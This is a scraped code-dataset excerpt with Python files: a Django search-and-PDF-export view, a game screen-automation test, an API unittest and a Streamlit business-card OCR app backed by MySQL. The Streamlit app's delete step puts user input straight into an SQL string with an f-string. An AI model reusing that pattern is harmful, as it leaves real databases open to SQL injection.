isDate = False\n \n if len(word_doctype) != 0:\n isDoctype = True\n \n else:\n isDoctype = False\n \n if len(word_piecenumber) != 0:\n isPiecenumber = True\n \n else:\n isPiecenumber = False\n \n if len(word_docname) != 0:\n isDocname = True\n \n else:\n isDocname = False\n \n if len(word_id_docname) != 0:\n isIdDocname = True\n \n else:\n isIdDocname = False\n \n\n #When at least a word is being searched and there are no Search Options\n \n if word ==\"all\" and isAmount == False and isCompanyname == False and isDate == False and isDoctype == False and isPiecenumber == False and isDocname == False and isIdDocname == False:\n \n #helper_list = temp_list.filter(ocrrecord_link__Company__icontains=word) | temp_list.filter(ocrrecord_link__Amount__icontains=word) | temp_list.filter(ocrrecord_link__IssueDate__icontains=word)\n\n final_list = records_list\n \n # Unused filters:\n '''no_options_wordlist.filter(sourcedoc_link__filename__icontains=word)| no_options_wordlist.filter(modification_date=word) | no_options_wordlist.filter(record_link__name__icontains=word) | no_options_wordlist.filter(filename__icontains=word) '''\n\n #When there are Search Options (Amount,etc)\n \n else:\n \n final_list=temp_list\n \n \n if isAmount:\n \n if word_amount.startswith('\"') and word_amount.endswith('\"'):\n \n word_amount = word_amount.replace('\"', '')\n helper_list = final_list.filter(ocrrecord_link__Amount__exact=word_amount)\n word_amount = '\"'+word_amount+'\"'\n \n else:\n \n helper_list = final_list.filter(ocrrecord_link__Amount__icontains=word_amount)\n \n \n final_list = helper_list\n \n \n \n if isCompanyname:\n \n if word_companyname.startswith('\"') and word_companyname.endswith('\"'):\n \n word_companyname = word_companyname.replace('\"', '')\n helper_list = final_list.filter(ocrrecord_link__Company__iexact=word_companyname)\n word_companyname = '\"'+word_companyname+'\"'\n else:\n \n helper_list = final_list.filter(ocrrecord_link__Company__icontains=word_companyname)\n \n final_list = helper_list\n \n \n if isDate:\n \n constructed_date = word_date.split(\"/\")\n \n helper_list = final_list\n\n if len(constructed_date) > 0:\n day = 
constructed_date[0]\n if day != \"XX\" and day !=\"NaN\" and day != \"?\":\n helper_list = helper_list.filter(ocrrecord_link__Day__exact=day)\n \n if len(constructed_date) > 1:\n month = constructed_date[1]\n if month != \"XX\" and month !=\"NaN\" and month != \"?\":\n helper_list = helper_list.filter(ocrrecord_link__Month__exact=month)\n \n if len(constructed_date) > 2:\n year = constructed_date[2]\n if year != \"XXXX\" and year !=\"NaN\" and year != \"?\":\n helper_list = helper_list.filter(ocrrecord_link__Year__exact=year)\n\n\n final_list = helper_list\n \n '''helper_list = final_list.filter(ocrrecord_link__IssueDate__icontains=word_date)\n final_list = helper_list'''\n \n if isDoctype:\n \n doctype = SourceDocType.objects.filter(pretty_name__iexact=word_doctype)|SourceDocType.objects.filter(name__iexact=word_doctype.lower())\n doctype = doctype.distinct()\n \n if len(doctype) == 1:\n \n helper_list = final_list.filter(modified_document_type = doctype[0])\n final_list = helper_list\n \n if isPiecenumber:\n \n if word_piecenumber.startswith('\"') and word_piecenumber.endswith('\"'):\n \n word_piecenumber = word_piecenumber.replace('\"', '')\n helper_list = final_list.filter(ocrrecord_link__Piece_Number__iexact=word_piecenumber)\n word_piecenumber = '\"'+word_piecenumber+'\"'\n else:\n \n helper_list = final_list.filter(ocrrecord_link__Piece_Number__icontains=word_piecenumber)\n \n \n final_list = helper_list\n \n if isDocname:\n \n if word_docname.startswith('\"') and word_docname.endswith('\"'):\n \n word_docname = word_docname.replace('\"', '')\n helper_list = final_list.filter(sourcedoc_link__filename__iexact=word_docname)\n word_docname = '\"'+word_docname+'\"'\n \n else:\n \n helper_list = final_list.filter(sourcedoc_link__filename__icontains=word_docname)\n \n final_list = helper_list\n\n if isIdDocname:\n \n separated_string = word_id_docname.split('.', 1)\n \n if len(separated_string) == 2:\n helper_list = final_list.filter(pk=separated_string[0],sourcedoc_link__filename=separated_string[1])\n final_list = helper_list\n \n else:\n final_list = PdfRecord.objects.none()\n \n \n \n records_list = final_list \n\n total_records = records_list.count()\n \n if max_num > total_records:\n \n max_num = total_records\n \n if actual_min_num > max_num and max_num != 0:\n \n actual_min_num = max_num\n \n if records_list:\n \n #Sort by Categories depending on the user's input in the Search Tool:\n \n \n category_fields_order_list = category_fields_order_list.split(',')\n \n category_temp_list = filter(bool, category_fields_order_list)\n \n \n if len(category_temp_list):\n \n for item in category_temp_list:\n if len(item):\n \n records_list = records_list.order_by(item)\n \n \n else:\n records_list = records_list.order_by('pk')\n \n \n category_fields_order_list = \",\".join(category_temp_list)\n \n merging_records = records_list\n records_list = records_list[actual_min_num-1:max_num]\n \n \n elif corpus_word==\"corpus_internal_records\":\n \n \n #Filters block\n \n \n if filter_word==\"pdf_error\":\n \n records_list = Record.objects.filter(commentary__contains=\"Error detected\")\n \n elif filter_word==\"pdf_linked\":\n \n records_list = Record.objects.filter(status=\"linked\")\n \n elif filter_word==\"pdf_unlinked\":\n \n records_list = Record.objects.filter(status=\"unlinked\")\n \n else:\n \n filter_word=\"pdf_all\"\n records_list = Record.objects.all()\n\n #Making lists to use in the Search of Coincidences\n \n temp_list = records_list\n final_list = Record.objects.none()\n \n \n #Check 
which Search Options are covered\n \n if len(word_amount_credit) != 0:\n isAmountcredit = True\n \n else:\n isAmountcredit = False\n \n if len(word_amount_debit) != 0:\n isAmountdebit = True\n \n else:\n isAmountdebit = False\n\n if len(word_companyname) != 0:\n isCompanyname = True\n \n else:\n isCompanyname = False\n \n \n if len(word_date) != 0:\n isDate = True\n \n else:\n isDate = False\n \n\n if len(word_piecenumber) != 0:\n isPiecenumber = True\n \n else:\n isPiecenumber = False\n \n if len(word_accountnumber) != 0:\n isAccountnumber = True\n \n else:\n isAccountnumber = False\n \n if len(word_movnumber) != 0:\n isMovementnumber = True\n \n else:\n isMovementnumber = False\n \n if len(word_journal) != 0:\n isJournal = True\n \n else:\n isJournal = False\n \n if len(word_s) != 0:\n isS = True\n \n else:\n isS = False\n \n if len(word_lett) != 0:\n isLett = True\n \n else:\n isLett = False\n \n if len(word_docname) != 0:\n isDocname = True\n \n else:\n isDocname = False\n \n if len(word_id) != 0:\n isId = True\n \n else:\n isId = False\n \n\n #When at least a word is being searched and there are no Search Options\n \n if word ==\"all\" and isAmountcredit == False and isAmountdebit == False and isCompanyname == False and isDate == False and isPiecenumber == False and isAccountnumber == False and isMovementnumber == False and isJournal == False and isS == False and isLett == False and isId == False:\n \n #helper_list = temp_list.filter(ocrrecord_link__Company__icontains=word) | temp_list.filter(ocrrecord_link__Amount__icontains=word) | temp_list.filter(ocrrecord_link__IssueDate__icontains=word)\n\n final_list = records_list\n \n # Unused filters:\n '''no_options_wordlist.filter(sourcedoc_link__filename__icontains=word)| no_options_wordlist.filter(modification_date=word) | no_options_wordlist.filter(record_link__name__icontains=word) | no_options_wordlist.filter(filename__icontains=word) '''\n\n #When there are Search Options (Amount,etc)\n \n else:\n \n final_list=temp_list\n \n \n if isAmountcredit:\n \n if word_amount_credit.startswith('\"') and word_amount_credit.endswith('\"'):\n \n word_amount_credit = word_amount_credit.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Credit__exact=word_amount_credit)\n word_amount_credit = '\"'+word_amount_credit+'\"'\n \n else:\n \n helper_list = final_list.filter(internalrecord_link__Credit__icontains=word_amount_credit)\n \n \n final_list = helper_list\n \n if isAmountdebit:\n \n if word_amount_debit.startswith('\"') and word_amount_debit.endswith('\"'):\n \n word_amount_debit = word_amount_debit.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Debit__exact=word_amount_debit)\n word_amount_debit = '\"'+word_amount_debit+'\"'\n \n else:\n \n helper_list = final_list.filter(internalrecord_link__Debit__icontains=word_amount_debit)\n \n \n final_list = helper_list\n \n if isCompanyname:\n \n if word_companyname.startswith('\"') and word_companyname.endswith('\"'):\n \n word_companyname = word_companyname.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Company__iexact=word_companyname)\n word_companyname = '\"'+word_companyname+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__Company__icontains=word_companyname)\n \n final_list = helper_list\n \n \n if isDate:\n \n constructed_date = word_date.split(\"/\")\n \n helper_list = final_list\n\n if len(constructed_date) > 0:\n day = constructed_date[0]\n if day != \"XX\" and day !=\"NaN\" and day != \"?\":\n 
helper_list = helper_list.filter(internalrecord_link__Day__exact=day)\n \n if len(constructed_date) > 1:\n month = constructed_date[1]\n if month != \"XX\" and month !=\"NaN\" and month != \"?\":\n helper_list = helper_list.filter(internalrecord_link__Month__exact=month)\n \n if len(constructed_date) > 2:\n year = constructed_date[2]\n if year != \"XXXX\" and year !=\"NaN\" and year != \"?\":\n helper_list = helper_list.filter(internalrecord_link__Year__exact=year)\n\n\n final_list = helper_list\n \n \n if isPiecenumber:\n \n if word_piecenumber.startswith('\"') and word_piecenumber.endswith('\"'):\n \n word_piecenumber = word_piecenumber.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__NoPiece__iexact=word_piecenumber)\n word_piecenumber = '\"'+word_piecenumber+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__NoPiece__icontains=word_piecenumber)\n \n \n final_list = helper_list\n \n if isAccountnumber:\n \n if word_accountnumber.startswith('\"') and word_accountnumber.endswith('\"'):\n \n word_accountnumber = word_accountnumber.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__AccountNum__iexact=word_accountnumber)\n word_accountnumber = '\"'+word_accountnumber+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__AccountNum__icontains=word_accountnumber)\n \n \n final_list = helper_list\n \n if isMovementnumber:\n \n if word_movnumber.startswith('\"') and word_movnumber.endswith('\"'):\n \n word_movnumber = word_movnumber.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__NoMvt__iexact=word_movnumber)\n word_movnumber = '\"'+word_movnumber+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__NoMvt__icontains=word_movnumber)\n \n \n final_list = helper_list\n \n if isJournal:\n \n if word_journal.startswith('\"') and word_journal.endswith('\"'):\n \n word_journal = word_journal.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Journal__iexact=word_journal)\n word_journal = '\"'+word_journal+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__Journal__icontains=word_journal)\n \n \n final_list = helper_list\n\n if isS:\n \n if word_s.startswith('\"') and word_s.endswith('\"'):\n \n word_s = word_s.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__S__iexact=word_s)\n word_s = '\"'+word_s+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__S__icontains=word_s)\n \n \n final_list = helper_list\n \n if isLett:\n \n if word_lett.startswith('\"') and word_lett.endswith('\"'):\n \n word_lett = word_lett.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Lett__iexact=word_lett)\n word_lett = '\"'+word_lett+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__Lett__icontains=word_lett)\n \n \n final_list = helper_list\n \n if isId:\n \n\n if len(word_id) > 0:\n helper_list = final_list.filter(pk=word_id)\n final_list = helper_list\n \n else:\n final_list = PdfRecord.objects.none()\n \n \n records_list = final_list \n \n total_records = records_list.count()\n \n if max_num > total_records:\n \n max_num = total_records\n \n if actual_min_num > max_num and max_num != 0:\n \n actual_min_num = max_num\n \n if records_list:\n \n #Sort by Categories depending on the user's input in the Search Tool:\n \n \n category_fields_order_list = category_fields_order_list.split(',')\n \n category_temp_list = filter(bool, category_fields_order_list)\n \n \n if 
len(category_temp_list):\n \n for item in category_temp_list:\n if len(item):\n \n records_list = records_list.order_by(item)\n \n \n else:\n records_list = records_list.order_by('pk')\n \n \n category_fields_order_list = \",\".join(category_temp_list)\n \n \n merging_records = records_list\n records_list = records_list[actual_min_num-1:max_num]\n \n ##### COMMON BLOCK ####\n \n \n \n try:\n export_mark = request.POST['export_mark']\n except (KeyError):\n \n export_mark = \"none\"\n \n #if export_mark == \"export_mark\":\n \n \n if export_mark == \"export_mark\" and corpus_word!=\"corpus_internal_records\":\n \n if len(merging_records) > 10:\n \n merging_records = merging_records[:10]\n\n response = HttpResponse(mimetype=\"application/pdf\")\n response['Content-Disposition'] = 'attachment; filename=output_document.pdf'\n output = PdfFileWriter()\n \n with transaction.commit_on_success():\n for record in merging_records:\n \n if corpus_word==\"corpus_source_records\":\n \n source_url = \"http://54.200.180.182/sourcepdfs/%s/%s\" %(record.job_directory, record.filename)\n \n if corpus_word==\"corpus_ocr_records\":\n \n source_url = \"http://54.200.180.182/sourcepdfs/%s/%s\" %(record.sourcedoc_link.job_directory, record.sourcedoc_link.filename)\n\n remoteFile = urlopen(Request(source_url)).read()\n memoryFile = StringIO(remoteFile)\n input_pdf = PdfFileReader(memoryFile)\n \n output.addPage(input_pdf.getPage(0))\n \n \n outputStream = StringIO()\n output.write(outputStream)\n response.write(outputStream.getvalue())\n return response\n \n \n showing_records = records_list.count()\n \n\n page_counter_end = actual_min_num + showing_records - 1\n \n plus_limit = total_records-50\n \n if showing_records == 0:\n \n actual_min_num = 0\n max_num = 0 \n page_counter_end = 0\n \n \n \n context = {'user_type':user_type,\n 'records_list':records_list,'types_list':types_list,'companyname_list':companyname_list,'corpus_word':corpus_word,'filter_word': filter_word,\n 'word_amount':word_amount,'word_companyname':word_companyname,'word_amount_credit':word_amount_credit,'word_amount_debit':word_amount_debit,\n 'word_date':word_date,'word_doctype':word_doctype,'word_piecenumber':word_piecenumber,'word_accountnumber':word_accountnumber,\n 'word_movnumber':word_movnumber,'word_journal':word_journal,'word_s':word_s,'word_lett':word_lett,'word_id':word_id,\n 'word_job_directory':word_job_directory,'word_multipart_filename':word_multipart_filename,\n 'word_docname':word_docname,'word_id_docname':word_id_docname,'total_records':total_records,\n 'page_counter_beginning':actual_min_num,'page_counter_end':page_counter_end,'plus_limit':plus_limit,\n 'category_fields_order_list':category_fields_order_list,'the_user':the_user}\n \n return render(request,'enersectapp/search_tool.html',context)", "repo_name": "HinWise/LegalDiscovery", "sub_path": "enersectapp/viewsfunctions/search_tool_module.py", "file_name": "search_tool_module.py", "file_ext": "py", "file_size_in_byte": 39603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.http.HttpResponseRedirect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 502, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 502, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 511, "usage_type": 
"call"}, {"api_name": "datetime.datetime", "line_number": 511, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.utc", "line_number": 511, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 511, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 1112, "usage_type": "call"}, {"api_name": "pyPdf.PdfFileWriter", "line_number": 1114, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 1116, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 1116, "usage_type": "name"}, {"api_name": "urllib2.urlopen", "line_number": 1127, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 1127, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 1128, "usage_type": "call"}, {"api_name": "pyPdf.PdfFileReader", "line_number": 1129, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 1134, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 1165, "usage_type": "call"}]}
+{"seq_id": "18138544155", "text": "import win32com.client\nimport pyautogui as pag\n\ndm = win32com.client.Dispatch('dm.dmsoft')\n\nx, y = pag.position()\npos = [x - 50, y - 50, 100, 100]\n# dm_ret = dm.Capture(x-50,y-50,x+50,y+50,\"screen.bmp\")\n# print(dm_ret)\n\na,b = 0,0\ndm_ret = dm.FindMulColor(x-50,y-50,x+50,y+50,\"feda25\",0.9)\nprint(dm_ret)\nif a>0 or b>0:\n print(\"找到\")\n\ndm_ret = dm.FindPic(x-50,y-50,x+50,y+50,\"E:\\python_workplace\\yundinghuanwei/feature.bmp\",\"202020\",0.5,0,a,b)\n# print(dm_ret)\n\nif a>0 or b>0:\n print(\"找到\")", "repo_name": "adzcsx2/lol_Teamfight_change_position_quick", "sub_path": "dmtest.py", "file_name": "dmtest.py", "file_ext": "py", "file_size_in_byte": 499, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "win32com.client.client.Dispatch", "line_number": 4, "usage_type": "call"}, {"api_name": "win32com.client.client", "line_number": 4, "usage_type": "attribute"}, {"api_name": "win32com.client", "line_number": 4, "usage_type": "name"}, {"api_name": "pyautogui.position", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "25965379005", "text": "#coding=utf-8\nimport unittest\nimport requests\nimport logging\n\nclass getWeather(unittest.TestCase):\n\n def setUp(self):\n self.url='http://www.sojson.com/open/api/weather/json.shtml'\n self.headers = {\"Content-Type\": \"application/json\"}\n self.data = {\n \"channel\": \"CHN_D00000\",\n \"transType\": \"REDEEM\",\n \"flowId\": \"213245678901234567890\",\n \"clientId\": \"CHN_TRANSFORMER\",\n \"transDatetime\": 11111\n }\n\n def test_beijng(self):\n response = requests.post(url=self.url, json=self.data, headers=self.headers)\n result=response.json()\n print(result)\n #logging.log()\n self.assertEqual(result['status'],200)\n self.assertEqual(result['message'], 'Success !')\n\nif __name__ == \"__main__\":\n suit=unittest.TestSuite\n suit.addTests(getWeather('test_beijng'))\n runner=unittest.TextTestRunner()\n runner.run(suit)\n", "repo_name": "msy53719/interface-python-test", "sub_path": "httprequest/HttpTest_Post.py", "file_name": "HttpTest_Post.py", "file_ext": "py", "file_size_in_byte": 907, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 20, "usage_type": "call"}, {"api_name": "unittest.TestSuite", "line_number": 28, "usage_type": "attribute"}, {"api_name": "unittest.TextTestRunner", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "38031661836", "text": "# IMPORTING LIBRARIES\r\nimport streamlit as st \r\nimport mysql.connector\r\nimport pandas as pd\r\nimport cv2\r\nimport easyocr\r\nimport os \r\nimport re \r\nimport matplotlib.pyplot as plt \r\nimport base64 \r\n# SETTING PAGE CONFIGURATIONS\r\nst.set_page_config(page_title=\"BizCardX: Extracting Business Card Data with OCR\",\r\n layout=\"wide\",\r\n initial_sidebar_state=\"expanded\"\r\n )\r\nst.markdown(\"BizCardX: Extracting Business Card Data with OCR \", unsafe_allow_html=True)\r\ndef add_bg_from_local(image_file):\r\n with open(image_file, \"rb\") as image_file:\r\n encoded_string = base64.b64encode(image_file.read())\r\n st.markdown(\r\n f\"\"\"\r\n \r\n \"\"\",\r\n unsafe_allow_html=True\r\n )\r\nadd_bg_from_local('background.jpg') \r\n# CREATING TABS\r\ntab1, tab2, tab3 = st.tabs([\"🏠Home\",\"⬆️Update & Extract\",\"📝Modify\"])\r\n# INITIALIZING THE EasyOCR READER\r\nreader = easyocr.Reader(['en'])\r\n# CONNECTING WITH MYSQL DATABASE\r\nmydb = mysql.connector.connect(host=\"localhost\",\r\n user=\"root\",\r\n password=\"your_password\",\r\n database= \"your_database_name\"\r\n )\r\nmycursor = mydb.cursor(buffered=True)\r\n# TABLE CREATION\r\nmycursor.execute('''CREATE TABLE IF NOT EXISTS bizcard_data\r\n (id INTEGER PRIMARY KEY AUTO_INCREMENT,\r\n company_name TEXT,\r\n card_holder TEXT,\r\n designation TEXT,\r\n mobile_number VARCHAR(50),\r\n email TEXT,\r\n website TEXT,\r\n area TEXT,\r\n city TEXT,\r\n state TEXT,\r\n pin_code VARCHAR(10),\r\n image LONGBLOB\r\n )''')\r\n# HOME MENU\r\nwith tab1:\r\n st.markdown(\"## :[**TECHNOLOGIES USED :**] Python, easy OCR, Streamlit, SQL, Pandas\")\r\n st.markdown(\"## :[**OVERVIEW :**] • In this streamlit web app you can upload an image of a business card and extract relevant information from it using easyOCR.\")\r\n st.markdown(\"## • You can view, modify or delete the extracted data in this app.\")\r\n st.markdown(\"## • This app would also allow users to save the extracted information into a database along with the uploaded business card image.\")\r\n st.markdown(\"## • The database would be able to store multiple entries, each with its own business card image and extracted information.\")\r\n# UPLOAD AND EXTRACT MENU\r\nwith tab2:\r\n st.markdown(\"### Upload a Business Card\")\r\n uploaded_card = st.file_uploader(\"upload here\",label_visibility=\"collapsed\",type=[\"png\",\"jpeg\",\"jpg\"])\r\n \r\n if uploaded_card is not None:\r\n def save_card(uploaded_card):\r\n with open(os.path.join(\"uploaded_cards\",uploaded_card.name), \"wb\") as f:\r\n f.write(uploaded_card.getbuffer()) \r\n save_card(uploaded_card)\r\n\r\n def image_preview(image,res): \r\n for (bbox, text, prob) in res: \r\n # unpack the bounding box\r\n (tl, tr, br, bl) = bbox\r\n tl = (int(tl[0]), int(tl[1]))\r\n tr = (int(tr[0]), int(tr[1]))\r\n br = (int(br[0]), int(br[1]))\r\n bl = (int(bl[0]), int(bl[1]))\r\n cv2.rectangle(image, tl, br, (0, 255, 0), 2)\r\n cv2.putText(image, text, (tl[0], tl[1] - 10),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 2)\r\n plt.rcParams['figure.figsize'] = (15,15)\r\n plt.axis('off')\r\n plt.imshow(image)\r\n # DISPLAYING THE UPLOADED CARD\r\n col1,col2 = st.columns(2,gap=\"large\")\r\n with col1:\r\n st.markdown(\"# \")\r\n st.markdown(\"# \")\r\n st.markdown(\"### You have uploaded the card\")\r\n st.image(uploaded_card)\r\n # DISPLAYING THE CARD WITH HIGHLIGHTS\r\n with col2:\r\n st.markdown(\"# \")\r\n st.markdown(\"# \")\r\n with st.spinner(\"Please wait processing image...\"):\r\n 
st.set_option('deprecation.showPyplotGlobalUse', False)\r\n saved_img = os.getcwd()+ \"\\\\\" + \"uploaded_cards\"+ \"\\\\\"+ uploaded_card.name\r\n image = cv2.imread(saved_img)\r\n res = reader.readtext(saved_img)\r\n st.markdown(\"### Image Processed and Data Extracted\")\r\n st.pyplot(image_preview(image,res))\r\n saved_img = os.getcwd()+ \"\\\\\" + \"uploaded_cards\"+ \"\\\\\"+ uploaded_card.name\r\n result = reader.readtext(saved_img,detail = 0,paragraph=False)\r\n # CONVERTING IMAGE TO BINARY TO UPLOAD TO SQL DATABASE\r\n def img_to_binary(file):\r\n with open(file, 'rb') as file:\r\n binaryData = file.read()\r\n return binaryData\r\n \r\n data = {\"company_name\" : [],\r\n \"card_holder\" : [],\r\n \"designation\" : [],\r\n \"mobile_number\" :[],\r\n \"email\" : [],\r\n \"website\" : [],\r\n \"area\" : [],\r\n \"city\" : [],\r\n \"state\" : [],\r\n \"pin_code\" : [],\r\n \"image\" : img_to_binary(saved_img)\r\n }\r\n\r\n def get_data(res):\r\n for ind,i in enumerate(res):\r\n\r\n # To get WEBSITE_URL\r\n if \"www \" in i.lower() or \"www.\" in i.lower():\r\n data[\"website\"].append(i)\r\n elif \"WWW\" in i:\r\n data[\"website\"] = res[4] +\".\" + res[5]\r\n\r\n # To get EMAIL ID\r\n elif \"@\" in i:\r\n data[\"email\"].append(i)\r\n\r\n # To get MOBILE NUMBER\r\n elif \"-\" in i:\r\n data[\"mobile_number\"].append(i)\r\n if len(data[\"mobile_number\"]) ==2:\r\n data[\"mobile_number\"] = \" & \".join(data[\"mobile_number\"])\r\n\r\n # To get COMPANY NAME \r\n elif ind == len(res)-1:\r\n data[\"company_name\"].append(i)\r\n\r\n # To get CARD HOLDER NAME\r\n elif ind == 0:\r\n data[\"card_holder\"].append(i)\r\n\r\n # To get DESIGNATION\r\n elif ind == 1:\r\n data[\"designation\"].append(i)\r\n\r\n # To get AREA\r\n if re.findall('^[0-9].+, [a-zA-Z]+',i):\r\n data[\"area\"].append(i.split(',')[0])\r\n elif re.findall('[0-9] [a-zA-Z]+',i):\r\n data[\"area\"].append(i)\r\n\r\n # To get CITY NAME\r\n match1 = re.findall('.+St , ([a-zA-Z]+).+', i)\r\n match2 = re.findall('.+St,, ([a-zA-Z]+).+', i)\r\n match3 = re.findall('^[E].*',i)\r\n if match1:\r\n data[\"city\"].append(match1[0])\r\n elif match2:\r\n data[\"city\"].append(match2[0])\r\n elif match3:\r\n data[\"city\"].append(match3[0])\r\n\r\n # To get STATE\r\n state_match = re.findall('[a-zA-Z]{9} +[0-9]',i)\r\n if state_match:\r\n data[\"state\"].append(i[:9])\r\n elif re.findall('^[0-9].+, ([a-zA-Z]+);',i):\r\n data[\"state\"].append(i.split()[-1])\r\n if len(data[\"state\"])== 2:\r\n data[\"state\"].pop(0)\r\n\r\n # To get PINCODE \r\n if len(i)>=6 and i.isdigit():\r\n data[\"pin_code\"].append(i)\r\n elif re.findall('[a-zA-Z]{9} +[0-9]',i):\r\n data[\"pin_code\"].append(i[10:])\r\n get_data(result)\r\n # FUNCTION TO CREATE DATAFRAME\r\n def create_df(data):\r\n df = pd.DataFrame(data)\r\n return df\r\n df = create_df(data)\r\n st.success(\"### Data Extracted!\")\r\n st.write(df)\r\n \r\n if st.button(\"Upload to Database\"):\r\n for i,row in df.iterrows():\r\n sql = \"\"\"INSERT INTO bizcard_data(company_name,card_holder,designation,mobile_number,email,website,area,city,state,pin_code,image)\r\n VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\"\"\r\n mycursor.execute(sql, tuple(row))\r\n mydb.commit()\r\n st.success(\"#### Uploaded to database successfully!\")\r\n \r\n# MODIFY MENU \r\nwith tab3:\r\n col1,col2,col3 = st.columns([3,3,2])\r\n col2.markdown(\"## Alter or Delete the data here\")\r\n column1,column2 = st.columns(2,gap=\"large\")\r\n try:\r\n with column1:\r\n mycursor.execute(\"SELECT card_holder FROM 
bizcard_data\")\r\n result = mycursor.fetchall()\r\n business_cards = {}\r\n for row in result:\r\n business_cards[row[0]] = row[0]\r\n selected_card = st.selectbox(\"Select a card holder name to update\", list(business_cards.keys()))\r\n st.markdown(\"#### Update or modify any data below\")\r\n mycursor.execute(\"select company_name,card_holder,designation,mobile_number,email,website,area,city,state,pin_code from bizcard_data WHERE card_holder=%s\",\r\n (selected_card,))\r\n result = mycursor.fetchone()\r\n\r\n # DISPLAYING ALL THE INFORMATIONS\r\n company_name = st.text_input(\"Company_Name\", result[0])\r\n card_holder = st.text_input(\"Card_Holder\", result[1])\r\n designation = st.text_input(\"Designation\", result[2])\r\n mobile_number = st.text_input(\"Mobile_Number\", result[3])\r\n email = st.text_input(\"Email\", result[4])\r\n website = st.text_input(\"Website\", result[5])\r\n area = st.text_input(\"Area\", result[6])\r\n city = st.text_input(\"City\", result[7])\r\n state = st.text_input(\"State\", result[8])\r\n pin_code = st.text_input(\"Pin_Code\", result[9])\r\n\r\n if st.button(\"Commit changes to DB\"):\r\n # Update the information for the selected business card in the database\r\n mycursor.execute(\"\"\"UPDATE bizcard_data SET company_name=%s,card_holder=%s,designation=%s,mobile_number=%s,email=%s,website=%s,area=%s,city=%s,state=%s,pin_code=%s\r\n WHERE card_holder=%s\"\"\", (company_name,card_holder,designation,mobile_number,email,website,area,city,state,pin_code,selected_card))\r\n mydb.commit()\r\n st.success(\"Information updated in database successfully!\")\r\n\r\n with column2:\r\n mycursor.execute(\"SELECT card_holder FROM bizcard_data\")\r\n result = mycursor.fetchall()\r\n business_cards = {}\r\n for row in result:\r\n business_cards[row[0]] = row[0]\r\n selected_card = st.selectbox(\"Select a card holder name to Delete\", list(business_cards.keys()))\r\n st.write(f\"### You have selected :red[**{selected_card}'s**] card to delete\")\r\n st.write(\"#### Proceed to delete this card?\")\r\n\r\n if st.button(\"Yes Delete Business Card\"):\r\n mycursor.execute(f\"DELETE FROM bizcard_data WHERE card_holder='{selected_card}'\")\r\n mydb.commit()\r\n st.success(\"Business card information deleted from database.\")\r\n except:\r\n st.warning(\"There is no data available in the database\")\r\n \r\n if st.button(\"View updated data\"):\r\n mycursor.execute(\"select company_name,card_holder,designation,mobile_number,email,website,area,city,state,pin_code from bizcard_data\")\r\n updated_df = pd.DataFrame(mycursor.fetchall(),columns=[\"Company_Name\",\"Card_Holder\",\"Designation\",\"Mobile_Number\",\"Email\",\"Website\",\"Area\",\"City\",\"State\",\"Pin_Code\"])\r\n st.write(updated_df)\r\n \r\n", "repo_name": "MithunaKN/Bizcardx-Extracting-business-card-data-with-ocr", "sub_path": "Bizcard.py", "file_name": "Bizcard.py", "file_ext": "py", "file_size_in_byte": 11987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "streamlit.set_page_config", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 16, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 19, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.tabs", "line_number": 33, "usage_type": "call"}, {"api_name": "easyocr.Reader", "line_number": 35, "usage_type": "call"}, {"api_name": 
